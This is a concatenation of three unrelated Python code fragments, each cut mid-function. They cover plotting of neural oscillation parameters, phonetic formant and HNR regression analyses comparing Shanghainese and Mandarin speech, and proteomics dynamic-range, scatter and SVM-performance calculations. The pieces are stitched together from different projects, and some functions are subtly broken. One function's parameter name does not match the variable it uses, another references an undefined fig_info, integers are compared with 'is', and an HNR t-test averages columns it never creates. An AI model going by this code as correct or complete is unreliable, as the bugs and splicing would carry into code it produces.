ax[2].set_title('Band Width', {'fontsize': sp_fs})
ax[2].set_xlabel('Bandwidth (Hz)', {'fontsize': ax_fs})
ax[2].set_ylabel('Count', {'fontsize': ax_fs})
# Set ticks font size
plt.tick_params(axis='both', which='major', labelsize=ti_fs)
# Adjust subplot spacing
plt.subplots_adjust(hspace=0.4)
save_figure(save_out, '103-AllOscs', fig_info)
def plot_all_oscs_single(data, data_type, title, n_bins=160,
figsize=(15, 5), save_out=False, fig_info=FigInfo()):
"""Create a plot for a single oscillation parameter.
Parameters
----------
data : 1d array
Vector of oscillation parameter data.
data_type : {0, 1, 2}
Int refers to which osc parameter is being plotted.
Key: {0:'Center Frequency', 1:'Power', 2:'Bandwidth'
title : str
A string to append to the title.
n_bins : int, optional (default = 160)
Number of bins to use for the plot.
figsize : tuple, optional (default = (15, 5))
Size of the figure to make.
save_out : boolean, optional (default = False)
Whether to save out a copy of the figure.
"""
# Plot Settings
t_fs = fig_info.t_fs # Super Title Font Size
ax_fs = fig_info.ax_fs # Axis Label Font Size
ti_fs = fig_info.ti_fs # Axis ticks font size
# Set up for which data type
if data_type is 0:
data_title = 'Center Frequency'
xlab = 'Frequency'
elif data_type is 1:
data_title = 'Power'
xlab = 'Log Power'
data = np.log10(data)
elif data_type is 2:
data_title = 'Bandwidth'
xlab = 'Bandwidth (Hz)'
else:
raise UnknownDataTypeError('Data type not understood.')
# Set up plot
fig, ax = plt.subplots(figsize=figsize)
# Subplot 1 - Center Frequency
ax.hist(data, n_bins, color='#40425e', alpha=0.9)
# Set the title
if fig_info.add_title:
plt.title(data_title + ' ' + title, {'fontsize': t_fs, 'fontweight': 'bold'})
# Add axis labels
ax.set_xlabel(xlab, {'fontsize': ax_fs})
ax.set_ylabel('Count', {'fontsize': ax_fs})
# Set ticks font size
plt.tick_params(axis='both', which='major', labelsize=ti_fs)
# Set spines
set_axis_spines(ax, lw=fig_info.ax_lw)
# Hard code x-lims
#ax.set_xlim(3, max(data)+0.2)
ax.set_xlim(2.5, 32)
save_figure(save_out, '104-' + data_title + '_AllOscs', fig_info)
def plot_osc_param_comparison(centers_all, powers_all, bws_all, title,
save_out=False, fig_info=FigInfo()):
"""Plots comparisons between all oscillatory parameters.
Checks Centers vs. Bandwidth, Centers vs. Power and Bandwidth vs. Power.
Parameters
----------
centers_all : 1d array
Vector of the center frequencies for all oscillations.
powers_all : 1d array
Vector of the powers for all oscillations.
bws_all : 1d array
Vector of the bandwidths for all oscillations.
title : str
A string to append to the title.
save_out : boolean, optional (default = False)
Whether to save out a copy of the figure.
"""
# Plot Settings
st_fs = fig_info.t_fs # Super Title Font Size
sp_fs = fig_info.sp_fs # Subplot Title Font Size
ax_fs = fig_info.ax_fs # Axis Label Font Size
ti_fs = fig_info.ti_fs # Axis ticks font size
vis_opac = 0.1 # Alpha value for plotted data
# Set up subplots
fig, ax = plt.subplots(3, 1, figsize=(15, 15))
# Set plot super-title
if fig_info.add_title:
plt.suptitle('Oscillation Parameter Comparisons - ' + title,
fontsize=st_fs, fontweight='bold')
# Plot - Center vs. Bandwidth
ax[0].plot(centers_all, np.log10(bws_all), '.', alpha=vis_opac)
ax[0].set_title('Center vs. Bandwidth', {'fontsize': sp_fs, 'fontweight': 'bold'})
ax[0].set_xlabel('Centers', {'fontsize': ax_fs})
ax[0].set_ylabel('BW', {'fontsize': ax_fs})
# Plot - Centers vs. Power
ax[1].plot(centers_all, np.log10(powers_all), '.', alpha=vis_opac)
ax[1].set_title('Center vs. Power', {'fontsize': sp_fs, 'fontweight': 'bold'})
ax[1].set_xlabel('Centers', {'fontsize': ax_fs})
ax[1].set_ylabel('Log Power', {'fontsize': ax_fs})
# Plot - BWs vs. Powers
ax[2].plot(np.log10(bws_all), np.log10(powers_all), '.', alpha=vis_opac)
ax[2].set_title('BW vs. Power', {'fontsize': sp_fs, 'fontweight': 'bold'})
ax[2].set_xlabel('Bandwidth (Hz)', {'fontsize': ax_fs})
ax[2].set_ylabel('Log Power', {'fontsize': ax_fs})
# Adjust subplot spacing
plt.subplots_adjust(hspace=0.4)
# Set ticks font size
plt.tick_params(axis='both', which='major', labelsize=ti_fs)
save_figure(save_out, '105-OscComparison', fig_info)
def plot_corr_matrix(corr_dat, labels, save_out=False, fig_info=FigInfo()):
"""Plot correlation data.
Parameters
----------
corr_data : 2d array
Matrix of correlation data to plot.
labels : list of str
Labels for the rows & columns of `corr_data`.
save_out : boolean, optional (default = False)
Whether to save out a copy of the figure.
"""
# Plot Settings
t_fs = fig_info.t_fs # Title Font Size
ti_fs = fig_info.ti_fs # Axis ticks font size
# Set colormap to use
cmap = plt.get_cmap('seismic')
# Create the plot
#im = plt.matshow(corr_data, vmin=-1, vmax=1, cmap=cmap, interpolation='none')
im = plt.matshow(corr_data, vmin=-1, vmax=1, cmap=cmap, interpolation='nearest')
# Notes on using nearest here:
# https://github.com/matplotlib/matplotlib/issues/2972/
# Add title
if fig_info.add_title:
plt.title('Osc Band Correlations', {'fontsize': t_fs, 'fontweight': 'bold'}, y=1.15)
# Set tick labels
nums = list(range(len(labels)))
plt.xticks(nums, labels, rotation=45, ha='left')
plt.yticks(nums, labels)
# Set ticks font size
plt.tick_params(axis='both', which='major', labelsize=ti_fs)
# Add a colorbar - add padding to offset further from plot
plt.colorbar(pad=0.15)
save_figure(save_out, '106-CorrMat', fig_info)
def plot_corr_matrix_tri(corr_data, labels, save_out=False):
""" """
# Generate a mask for the upper triangle
mask = np.zeros_like(corr_data, dtype=np.bool)
mask[np.triu_indices_from(mask)] = True
# Generate a custom diverging colormap
cmap = sns.color_palette("coolwarm", 7)
# Draw the heatmap with the mask and correct aspect ratio
sns.heatmap(corr_data, mask=mask, cmap=cmap, annot=True, square=True,
vmin=-1, vmax=1, xticklabels=labels, yticklabels=labels)
save_figure(save_out, 'XX-corr_mat_tri', fig_info)
def plot_peak_boxplot(peaks, osc_band, save_out=False, fig_info=FigInfo()):
"""Plot a boxplot of peak frequencies within an oscillation band.
Parameters
----------
peaks : 1d array
Vector of peak frequencies for given oscillation band.
osc_band : str
Label of which osc band is being plotted.
save_out : boolean, optional (default = False)
Whether | |
import shutil
from pathlib import Path
import numpy as np
import pandas as pd
from matplotlib import pyplot as plt
import matplotlib.ticker as mtick
from scipy.optimize import minimize_scalar
import filter
kBarWidth = 0.2
def fitLine(row, formantName, start, end, outputDir):
key = '@'.join([row['Filename'], row['Annotation'], formantName])
x = np.arange(2, 11)
y = row[formantName + '_' +
str(start): formantName + '_' + str(end)].to_numpy(dtype='float')
coeff = np.polyfit(x, y, 4)
line1 = np.poly1d(coeff)
line1d = np.polyder(line1, 1)
line1dd = np.polyder(line1, 2)
line1dd_max = minimize_scalar(-line1dd, bounds=(2, 10), method='bounded')
inflection = line1dd_max.x
plt.plot(x, y, 'o')
plt.plot(x, line1(x), label='fitted line')
plt.plot(x, line1d(x), label='1st deriv')
plt.plot(x, line1dd(x), label='2nd deriv')
plt.axvline(x=inflection, linestyle='dashed', label='inflection')
plt.legend(loc='best')
plt.title(key)
# plt.show()
plt.savefig(outputDir / (key + '.png'))
plt.clf()
plt.cla()
# return pd.Series(coeff, index=['x4', 'x3', 'x2', 'x1', 'x0'])
return pd.Series(inflection, index=['Inflection_'+formantName])
def removeChars(s):
for c in [' ', '\\', '/', '^']:
s = s.replace(c, '')
return s
class Analyzer(object):
def RunAnalysis(self, df, group_name, output_base_dir):
raise NotImplementedError
def GetName(self):
raise NotImplementedError
class FormantQuantiles(Analyzer):
def GetName(self):
return "FormantQuantiles"
def GetInputType(self):
return "Formant"
def RunAnalysis(self, df, group_name, output_dir):
# output = df[['Filename']].copy()
# output['Annotation'] = df[['Annotation']]
df['barkF1_25p'] = df[['barkF1_3', 'barkF1_4']].mean(axis=1)
df['barkF1_75p'] = df[['barkF1_8', 'barkF1_9']].mean(axis=1)
df['barkF1_50p'] = df[['barkF1_6']]
df['barkF2_25p'] = df[['barkF2_3', 'barkF2_4']].mean(axis=1)
df['barkF2_75p'] = df[['barkF2_8', 'barkF2_9']].mean(axis=1)
df['barkF2_50p'] = df[['barkF2_6']]
df['diff_F1F1_25p'] = df['barkF1_25p'] - df['barkF2_25p']
df['diff_F1F1_50p'] = df['barkF1_50p'] - df['barkF2_50p']
df['diff_F1F1_75p'] = df['barkF1_75p'] - df['barkF2_75p']
output_debug = pd.concat(
[df[['Filename']],
df[['Annotation']],
df.loc[:, df.columns.str.startswith("barkF1")],
df.loc[:, df.columns.str.startswith("barkF2")],
df.loc[:, df.columns.str.startswith("diff")],
], axis=1)
output = pd.DataFrame(
df.loc[:, df.columns.str.startswith("diff")].mean()).T
output_path = output_dir / (group_name + '.csv')
output_debug_path = output_dir / (group_name + '.debug.csv')
output_debug.to_csv(output_debug_path, index=False)
output.to_csv(output_path, index=False)
class FormantQuantilesByDemographic(Analyzer):
def GetName(self):
return "FormantQuantilesByDemographic"
def GetInputType(self):
return "Formant"
def RunAnalysis(self, df, outer_filters, inner_filters, group_name, output_dir):
for outer_f in outer_filters:
key = outer_f.GetValue()
matched_rows = dict()
for _, row in df.iterrows():
if not outer_f.IsMatched(row):
continue
for inner_f in inner_filters:
if inner_f.IsMatched(row):
matched_rows.setdefault(
inner_f.GetValue(), []).append(row)
if len(matched_rows) == 0:
continue
x = np.arange(3)
for k, v in matched_rows.items():
matched_df = pd.DataFrame(v)
full_group_name = group_name + '@' + outer_f.GetValue() + '@@' + k
df_mean = self.ComputeMean(
matched_df, full_group_name, output_dir)
y = [df_mean['diff_F1F2_25p'][0],
df_mean['diff_F1F2_50p'][0],
df_mean['diff_F1F2_75p'][0]]
plt.bar(x, y, width=kBarWidth, label=k)
x = [xval + kBarWidth for xval in x]
plt.legend(bbox_to_anchor=(1.04, 1), loc="upper left")
plt.xticks([r + kBarWidth for r in range(3)],
('25%', '50%', '75%'))
plt.title(key)
plt.savefig(output_dir / (group_name + '@' +
key + '.png'), bbox_inches="tight")
plt.clf()
plt.cla()
def ComputeMean(self, df, full_group_name, output_dir):
df['barkF1_25p'] = df[['barkF1_3', 'barkF1_4']].mean(axis=1)
df['barkF1_75p'] = df[['barkF1_8', 'barkF1_9']].mean(axis=1)
df['barkF1_50p'] = df[['barkF1_6']]
df['barkF2_25p'] = df[['barkF2_3', 'barkF2_4']].mean(axis=1)
df['barkF2_75p'] = df[['barkF2_8', 'barkF2_9']].mean(axis=1)
df['barkF2_50p'] = df[['barkF2_6']]
df['diff_F1F2_25p'] = df['barkF1_25p'] - df['barkF2_25p']
df['diff_F1F2_50p'] = df['barkF1_50p'] - df['barkF2_50p']
df['diff_F1F2_75p'] = df['barkF1_75p'] - df['barkF2_75p']
output = pd.DataFrame(
df.loc[:, df.columns.str.startswith("diff")].mean()).T
output_path = output_dir / (full_group_name + '.csv')
output_debug_path = output_dir / (full_group_name + '.debug.csv')
output.to_csv(output_path, index=False)
df.to_csv(output_debug_path, index=False)
return output
class FormantRegression(Analyzer):
def GetName(self):
return "FormantRegression"
def GetInputType(self):
return "Formant"
def RunAnalysis(self, df, group_name, output_dir):
s_f1 = df.loc[:, df.columns.str.startswith("barkF1")].mean()
s_f2 = df.loc[:, df.columns.str.startswith("barkF2")].mean()
x = np.arange(0, 9)
y1 = s_f1['barkF1_2': 'barkF1_10'].to_numpy(dtype='float')
y2 = s_f2['barkF2_2': 'barkF2_10'].to_numpy(dtype='float')
coeff1 = np.polyfit(x, y1, 4)
coeff2 = np.polyfit(x, y2, 4)
line1 = np.poly1d(coeff1)
line2 = np.poly1d(coeff2)
# line1d = np.polyder(line1, 1)
# line2d = np.polyder(line2, 1)
line1dd = np.polyder(line1, 2)
line2dd = np.polyder(line2, 2)
line1dd_max = minimize_scalar(-line1dd,
bounds=(0, 8), method='bounded')
line2dd_max = minimize_scalar(-line2dd,
bounds=(0, 8), method='bounded')
inflection1 = line1dd_max.x
inflection2 = line2dd_max.x
df_inflex = pd.DataFrame(
data={'f1_inflection': [inflection1], 'f2_inflection': [inflection2]})
df_inflex.to_csv(output_dir / (group_name + '.csv'), index=False)
# Plot f1/f2
plt.plot(x, y1, 'o')
plt.plot(x, y2, 'x')
plt.plot(x, line1(x), label='F1 fitted')
plt.plot(x, line2(x), label='F2 fitted')
plt.legend(bbox_to_anchor=(1.04, 1), loc="upper left")
plt.title(group_name)
plt.savefig(output_dir / (group_name + '.fitted.png'),
bbox_inches="tight")
plt.clf()
plt.cla()
# plt.plot(x, line1d(x), label='F1 1st deriv')
# plt.plot(x, line2d(x), label='F2 1st deriv')
# Plot deriv and inflection
plt.plot(x, line1dd(x), label='F1 2nd deriv')
plt.plot(x, line2dd(x), label='F2 2nd deriv')
plt.axvline(x=inflection1, linestyle=':', label='F1 inflection')
plt.axvline(x=inflection2, linestyle='-.', label='F2 inflection')
plt.legend(bbox_to_anchor=(1.04, 1), loc="upper left")
plt.title(group_name)
plt.savefig(output_dir / (group_name + '.inflection.png'),
bbox_inches="tight")
plt.clf()
plt.cla()
output_debug_path = output_dir / (group_name + '.debug.csv')
df.to_csv(output_debug_path, index=False)
class HnrRegression(Analyzer):
def GetName(self):
return "HnrRegression"
def GetInputType(self):
return "HNR"
def RunAnalysis(self, df, group_name, output_dir):
for i in range(1, 10):
df['mid_'+str(i)] = df[['HNR_'+str(i),
'HNR_'+str(i+1)]].mean(axis=1)
sy = df.loc[:, df.columns.str.startswith('mid_')].mean()
y = sy['mid_1': 'mid_9'].to_numpy(dtype='float')
x = np.arange(0, 9)
coeff = np.polyfit(x, y, 4)
line1 = np.poly1d(coeff)
line1dd = np.polyder(line1, 2)
line1dd_max = minimize_scalar(-line1dd,
bounds=(0, 8), method='bounded')
inflection = line1dd_max.x
df_inflex = pd.DataFrame(data={'inflection': [inflection]})
df_inflex.to_csv(output_dir / (group_name + '.csv'), index=False)
plt.plot(x, y, 'o')
plt.plot(x, line1(x), label='fitted')
plt.plot(x, line1dd(x), label='2nd deriv')
plt.axvline(x=inflection, linestyle=':', label='inflection')
plt.legend(bbox_to_anchor=(1.04, 1), loc="upper left")
plt.title(group_name)
plt.savefig(output_dir / (group_name + '.png'), bbox_inches="tight")
plt.clf()
plt.cla()
output_debug_path = output_dir / (group_name + '.debug.csv')
df.to_csv(output_debug_path, index=False)
class HnrQuantilesMean(Analyzer):
def GetName(self):
return "HnrQuantilesMean"
def GetInputType(self):
return "HNR"
def RunAnalysis(self, df, group_name, output_dir):
df['HNR_p25'] = df[['HNR_2', 'HNR_3']].mean(axis=1)
df['HNR_p75'] = df[['HNR_7', 'HNR_8']].mean(axis=1)
df['HNR_p50'] = df[['HNR_5']]
output = pd.DataFrame(
df.loc[:, df.columns.str.startswith("HNR_p")].mean()).T
output_path = output_dir / (group_name + '.csv')
output.to_csv(output_path, index=False)
output_debug_path = output_dir / (group_name + '.debug.csv')
df.to_csv(output_debug_path, index=False)
class HnrTTest(Analyzer):
def GetName(self):
return "HnrTTest"
def GetInputType(self):
return "HNR"
def RunAnalysis(self, df, group_name, output_dir):
df['HNR_25p'] = df[['HNR_2', 'HNR_3']].mean(axis=1)
df['HNR_75p'] = df[['HNR_7', 'HNR_8']].mean(axis=1)
df['HNR_50p'] = df[['HNR_5']]
output = pd.DataFrame(
df.loc[:, df.columns.str.startswith("diff")].mean()).T
output_path = output_dir / (group_name + '.csv')
output.to_csv(output_path, index=False)
output_debug_path = output_dir / (group_name + '.debug.csv')
df.to_csv(output_debug_path, index=False)
def ComputeF1F2Diff(df):
df['barkF1_25p'] = df[['barkF1_3', 'barkF1_4']].mean(axis=1)
df['barkF1_75p'] = df[['barkF1_8', 'barkF1_9']].mean(axis=1)
df['barkF2_25p'] = df[['barkF2_3', 'barkF2_4']].mean(axis=1)
df['barkF2_75p'] = df[['barkF2_8', 'barkF2_9']].mean(axis=1)
df['diff_F1_7525'] = df['barkF1_75p'] - df['barkF1_25p']
df['diff_F2_7525'] = df['barkF2_75p'] - df['barkF2_25p']
return df
class FormantQuantilesF1F2Base(Analyzer):
def __init__(self, filter_map):
self.filter_map = filter_map
def RunAnalysis(self, df, group_name, output_dir):
matched_rows_map = {}
for key, _ in self.filter_map.items():
matched_rows_map[key] = []
for _, row in df.iterrows():
for key, filters in self.filter_map.items():
is_all_matched = [f.IsMatched(row) for f in filters]
if np.all(is_all_matched):
matched_rows_map[key].append(row)
matched_df = {}
for key, rows in matched_rows_map.items():
matched_df[key] = pd.DataFrame(rows)
x = np.arange(2)
for key, mdf in matched_df.items():
mdf = ComputeF1F2Diff(mdf)
df_mean = pd.DataFrame(
mdf.loc[:, mdf.columns.str.startswith("diff")].mean()).T
mdf.to_csv(output_dir / (group_name + '@@@' +
key + '.debug.csv'), index=False)
df_mean.to_csv(output_dir / (group_name + '@@@' +
key+'Mean.debug.csv'), index=False)
y = [df_mean['diff_F1_7525'][0], df_mean['diff_F2_7525'][0]]
plt.bar(x, y, width=kBarWidth, label=key)
x = [xval + kBarWidth for xval in x]
plt.xticks([r + kBarWidth for r in range(2)], ('delta_F1', 'delta_F2'))
plt.legend(bbox_to_anchor=(1.04, 1), loc="upper left")
plt.title(group_name)
plt.savefig(output_dir / (group_name + '.png'), bbox_inches="tight")
plt.clf()
plt.cla()
class FormantQuantilesF1F2SaSb(FormantQuantilesF1F2Base):
def __init__(self):
super().__init__({
'Sa': [filter.IsShanghainese(), filter.IsPosition('a')],
'Sb': [filter.IsShanghainese(), filter.IsPosition('b')],
})
class FormantQuantilesF1F2SbMb(FormantQuantilesF1F2Base):
def __init__(self):
super().__init__({
'Sb': [filter.IsShanghainese(), filter.IsPosition('b')],
'Mb': [filter.IsMandarin(), filter.IsPosition('b')],
})
class FormantQuantilesSbMbBase(Analyzer):
def __init__(self, formant):
self.formant = formant
def RunAnalysis(self, df, group_name, output_dir):
rows_sb = []
rows_mb = []
for _, row in df.iterrows():
if filter.IsShanghainese().IsMatched(row) and filter.IsPosition('b').IsMatched(row):
rows_sb.append(row)
continue
if filter.IsMandarin().IsMatched(row) and filter.IsPosition('b').IsMatched(row):
rows_mb.append(row)
continue
df_sb = pd.DataFrame(rows_sb)
df_sb = ComputeF1F2Diff(df_sb)
df_sb_avg = pd.DataFrame(
df_sb.loc[:, df_sb.columns.str.startswith("diff")].mean()).T
df_sb.to_csv(output_dir / (group_name +
'@@@Sb.debug.csv'), index=False)
df_sb_avg.to_csv(output_dir / (group_name +
'@@@SbMean.debug.csv'), index=False)
df_mb = pd.DataFrame(rows_mb)
df_mb = ComputeF1F2Diff(df_mb)
df_mb_avg = pd.DataFrame(
df_mb.loc[:, df_mb.columns.str.startswith("diff")].mean()).T
df_mb.to_csv(output_dir / (group_name +
'@@@Mb.debug.csv'), index=False)
df_mb_avg.to_csv(output_dir / (group_name +
'@@@MbMean.debug.csv'), index=False)
x = ['Sb', 'Mb']
y = [df_sb_avg['diff_' + self.formant + '_7525'][0],
df_mb_avg['diff_'+self.formant+'_7525'][0]]
plt.bar(x, y, width=kBarWidth)
plt.title(group_name)
plt.savefig(output_dir / (group_name + '.png'), bbox_inches="tight")
plt.clf()
plt.cla()
class FormantQuantilesF1SbMb(FormantQuantilesSbMbBase):
def __init__(self):
super().__init__('F1')
class FormantQuantilesF2SbMb(FormantQuantilesSbMbBase):
def __init__(self):
super().__init__('F2')
class FormantRegressionBase(Analyzer):
def __init__(self, filters):
self.filters = filters
def RunAnalysis(self, df, group_name, output_dir):
matched_rows = []
for _, row in df.iterrows():
is_all_matched = [f.IsMatched(row) for f in self.filters]
if np.all(is_all_matched):
matched_rows.append(row)
df = pd.DataFrame(matched_rows)
filter_name = '_'.join([f.GetValue() for f in self.filters])
full_group_name = group_name + '@@' + filter_name
s_f1 = df.loc[:, df.columns.str.startswith("barkF1")].mean()
s_f2 = df.loc[:, df.columns.str.startswith("barkF2")].mean()
x = np.arange(0, 9)
y1 = s_f1['barkF1_2': 'barkF1_10'].to_numpy(dtype='float')
y2 = s_f2['barkF2_2': 'barkF2_10'].to_numpy(dtype='float')
coeff1 = np.polyfit(x, y1, 4)
coeff2 = np.polyfit(x, y2, 4)
line1 = np.poly1d(coeff1)
line2 = np.poly1d(coeff2)
line1dd = np.polyder(line1, 2)
line2dd = np.polyder(line2, 2)
# line1ddd = np.polyder(line1, 3)
# line2ddd = np.polyder(line2, 3)
line1dd_max = minimize_scalar(-line1dd,
bounds=(0, 8), method='bounded')
line2dd_max = minimize_scalar(-line2dd,
bounds=(0, 8), method='bounded')
inflection1 = line1dd_max.x
inflection2 = line2dd_max.x
# line1ddd_max_left = minimize_scalar(-line1ddd,
# bounds=(0, inflection1), method='bounded')
# line1ddd_max_right = minimize_scalar(-line1ddd,
# bounds=(inflection1, 8), method='bounded')
# line2ddd_max_left = minimize_scalar(-line2ddd,
# bounds=(0, inflection2), method='bounded')
# line2ddd_max_right = minimize_scalar(-line2ddd,
# bounds=(inflection2, 8), method='bounded')
# inflection1d_left = line1ddd_max_left.x
# inflection1d_right = line1ddd_max_right.x
# inflection2d_left = line2ddd_max_left.x
# inflection2d_right = line2ddd_max_right.x
df_inflex = pd.DataFrame(
data={'f1_inflection': [inflection1], 'f2_inflection': [inflection2]})
df_inflex.to_csv(output_dir / (full_group_name + '.csv'), | |
"Cluster", "Experiment"
Returns:
fig_dynamic_range: bar plot, dynamic range of each protein cluster for desired experiments is displayed.
"""
df_dynamicRange_combined = self.df_dynamicRange_combined.copy()
df_dynamicRange_combined = df_dynamicRange_combined[df_dynamicRange_combined["Experiment"].isin(multi_choice)]
df_dynamicRange_combined = df_dynamicRange_combined.assign(Experiment_lexicographic_sort = pd.Categorical(df_dynamicRange_combined["Experiment"],
categories=multi_choice, ordered=True))
df_dynamicRange_combined.sort_values(["Experiment_lexicographic_sort", "Dynamic Range"], inplace=True)
fig_dynamic_range = px.bar(df_dynamicRange_combined,
x="Cluster",
y="Dynamic Range",
base="Min",
facet_row="Experiment",
template="simple_white",
height=400*len(multi_choice),
width=1200)
df_dynamicRange_combined_ref = df_dynamicRange_combined.drop(["Experiment_lexicographic_sort"], axis=1)
df_dynamicRange_combined_ref = df_dynamicRange_combined.set_index(["Cluster", "Experiment"], drop=False).unstack("Cluster")["Dynamic Range"]
df_dynamicRange_combined_ref = df_dynamicRange_combined_ref.div(df_dynamicRange_combined_ref.xs(ref_exp))
df_RelDynamicRange = pd.concat([df_dynamicRange_combined_ref.median(axis=1), df_dynamicRange_combined_ref.sem(axis=1)], axis=1,
keys=["Dynamic Range (rel, median)", "SEM"]).reset_index()
if collapse_cluster == False:
df_dynamicRange_combined_ref = df_dynamicRange_combined_ref.stack("Cluster")
df_dynamicRange_combined_ref.name="Normalized Dynamic Range"
df_dynamicRange_combined_ref = df_dynamicRange_combined_ref.reset_index()
fig_RelDynamicRange = px.bar(df_dynamicRange_combined_ref,
x="Cluster",
y="Normalized Dynamic Range",
title="Dynamic Range - normalization to reference experiment: {}".format(ref_exp),
barmode="group",
template="simple_white",
color="Experiment")
fig_RelDynamicRange.update_xaxes(categoryorder="total ascending")
fig_RelDynamicRange.update_layout(autosize=False,
width=1200 if len(multi_choice)<=3 else 300*len(multi_choice),
height=500,
template="simple_white"
)
else:
fig_RelDynamicRange = px.bar(df_RelDynamicRange.sort_values("Dynamic Range (rel, median)"),
x="Experiment",
y="Dynamic Range (rel, median)",
error_x="SEM", error_y="SEM",
template="simple_white",
title="Dynamic Range - median of all individual normalized medians - reference experiment: {}".format(ref_exp),
color="Experiment")
fig_RelDynamicRange.update_layout(autosize=False,
width=250*len(multi_choice),
height=500,
template="simple_white"
)
return pn.Column(pn.Row(fig_dynamic_range), pn.Row(fig_RelDynamicRange))
def calculate_global_scatter(self, multi_choice, metric, consolidation):
"""
A distribution plot of the profile scatter in each experiment is generated, with variable distance metric and consolidation of replicates.
Args:
self:
df_01_filtered_combined: df, indexed
multi_choice: list of experiment names
metric: distance metric, one of 'euclidean distance', 'manhattan distance', '1 - cosine correlation', '1 - pearson correlation'
consolidation: method to consolidate replicate distances, one of 'median', 'average', 'sum'
Returns:
plot: plotly.figure_factory.displot, shows kernel density estiamtion in the main pane and a rug plot underneath. Traces are sorted by ascending median of the distribution.
"""
# Option dictionaries
cons_functions = {
"median": np.median,
"average": np.mean,
"sum": np.sum
}
metrics = {
"euclidean distance": "euclidean",
"manhattan distance": "manhattan",
"1 - cosine correlation": "cosine",
"1 - pearson correlation": lambda x,y: 1-np.corrcoef(x,y)[0][1],
"manhattan distance to average profile": [np.mean, pw.paired_manhattan_distances],
"manhattan distance to median profile": [np.median, pw.paired_manhattan_distances]
}
# Option assertion
assert consolidation in cons_functions.keys()
assert metric in metrics.keys()
# Filter experiments and intersection of proteins
df = self.df_01_filtered_combined.loc[
self.df_01_filtered_combined.index.get_level_values("Experiment").isin(multi_choice)].copy()
df.index = df.index.droplevel(["Exp_Map", "Gene names", "Compartment"])
if "Sequence" in df.index.names:
df.index = df.index.droplevel(["Protein IDs"])
df_across = df.unstack(["Experiment", "Map"]).dropna().stack(["Experiment", "Map"])
nPG = df_across.unstack(["Experiment", "Map"]).shape[0]
# Calculate and consolidate distances
distances = pd.DataFrame()
for exp in multi_choice:
df_m = df_across.xs(exp, level="Experiment", axis=0)
maps = list(set(df_m.index.get_level_values("Map")))
# this if clause switches between pairwise comparisons of profiles (else) and comparisons to an average/median profile
if " to " in metric:
df_m = df_m.unstack("Map")
# calculate reference profiles
df_profiles = df_m.stack("Fraction").apply(metrics[metric][0], axis=1).unstack("Fraction")
# calculate the distance for every map
distances_m = pd.DataFrame()
for m in maps:
dist_m = pd.DataFrame(metrics[metric][1](df_m.xs(m, level="Map", axis=1), df_profiles), columns = [m])
distances_m = pd.concat([distances_m, dist_m], axis=1)
distances_m.index = df_m.index
else:
distances_m = pd.DataFrame()
# loop over pairs of maps
for i,mapi in enumerate(maps):
for j,mapj in enumerate(maps):
# only look at each comparison once
if j <= i:
continue
dist = pw.paired_distances(df_m.xs(mapi, level="Map", axis=0).values,
df_m.xs(mapj, level="Map", axis=0).values,
metric = metrics[metric])
dist = pd.Series(dist, name="_".join([mapi,mapj]))
distances_m = pd.concat([distances_m, dist], axis=1)
distances_m.index = df_m.xs(maps[0], level="Map", axis=0).index
distances = pd.concat([distances, pd.Series(distances_m.apply(cons_functions[consolidation], axis=1), name=exp)], axis=1)
distances.index = distances_m.index
self.distances = distances
# Create and return plot
plot = ff.create_distplot(distances.T.values, distances.columns, show_hist=False)
plot.update_layout(title="Distribution of {} {}s, n = {}".format(metric, consolidation, nPG),
width=1500, height=600, template="simple_white", xaxis={"rangemode": "nonnegative"})
return plot
def svm_processing(self):
"""
The misclassification matrix, generated by Perseus, will be used for Recall/Precision calculation of each individual cluster and on a global level.
Data will be stored in a local dictionary that will be assigned to the global dictionary.
Args:
self.df_SVM: dataframe, provided by Perseus, no index;
Column names: e.g. "Predicted: ER", "Predicted: NPC"
Rows: e.g. "True: ER", "True: NPC"
Returns:
self.analysed_datasets_dict:
local dictionary (SVM_dict) will be assigned to the global dictionary self.analysed_datasets_dict, that is available for downloading
{"Experiment name" : {see def read_jsonFile(self) [below]}
{"Misclassification Analysis":
{
"True: ER" : {
"Recall": int,
"FDR": int,
"Precision": int,
"F1": int
}
"True: NPC" : {...}
...
"Summary": {...}
}
}
}
"""
global_SVM_dict_total = {}
global_SVM_dict = {}
for exp in self.json_dict.keys():
try:
df_SVM = pd.read_json(self.json_dict[exp]["Misclassification Matrix"])
df_SVM["T: True group"] = df_SVM["T: True group"].str.replace(r'True: ', '')
except KeyError:
continue
SVM_dict = {}
all_correct = np.diag(df_SVM)
members = df_SVM.sum(axis=1)
total_members = 0
membrame_members = 0
membrane_correct = 0
all_organelle_recall = []
all_organelle_precision = []
all_organelle_f1 = []
F1_all_cluster = []
no_of_membrane_clusters = 0
total_correct = sum(all_correct)
predicted_one_organelle = df_SVM.sum(axis=0)
for i in range(len(df_SVM)):
total_members = total_members + members[i]
recall = all_correct[i]/members[i]
fdr = (predicted_one_organelle[i]-all_correct[i])/predicted_one_organelle[i]
precision = 1-fdr
F1 = statistics.harmonic_mean([recall, precision])
F1_all_cluster.append(F1)
SVM_dict[df_SVM["T: True group"][i]] = {"Recall": recall, "FDR": fdr, "Precision": precision, "F1": F1}
if df_SVM["T: True group"][i]!="Nuclear pore complex" and df_SVM["T: True group"][i]!="Large Protein Complex" and df_SVM["T: True group"][i]!="Actin binding proteins" :
no_of_membrane_clusters = no_of_membrane_clusters+1
membrame_members = membrame_members + members[i]
membrane_correct = membrane_correct + all_correct[i]
all_organelle_f1.append(F1)
all_organelle_recall.append(recall)
all_organelle_precision.append(precision)
total_recall = total_correct/total_members
membrane_recall = membrane_correct/membrame_members
av_per_organelle_recall = statistics.mean(all_organelle_recall)
median_per_organelle_recall = statistics.median(all_organelle_recall)
av_per_organelle_precision = statistics.mean(all_organelle_precision)
avg_organelle_f1 = statistics.mean(all_organelle_f1)
avg_F1_all_cluster = statistics.mean(F1_all_cluster)
SVM_dict_total = {}
SVM_dict_total["Avg. all clusters"] = {"Recall": total_recall, "F1": avg_F1_all_cluster} #total recall = marker prediction accuracy
SVM_dict_total["Avg. all organelles"] = {"Recall": av_per_organelle_recall, "F1": avg_organelle_f1, "Precision": av_per_organelle_precision}
SVM_dict_total["Membrane"] = {"Recall": membrane_recall}
SVM_dict_total["Median. per organelle"] = {"Recall": median_per_organelle_recall}
global_SVM_dict[exp] = SVM_dict
global_SVM_dict_total[exp] = SVM_dict_total
self.global_SVM_dict = global_SVM_dict
self.global_SVM_dict_total = global_SVM_dict_total
if global_SVM_dict=={}:
self.cache_stored_SVM = False
return
else:
df_clusterPerformance_global = pd.DataFrame.from_dict({(i,j): global_SVM_dict[i][j]
for i in global_SVM_dict.keys()
for j in global_SVM_dict[i].keys()},
orient='index')
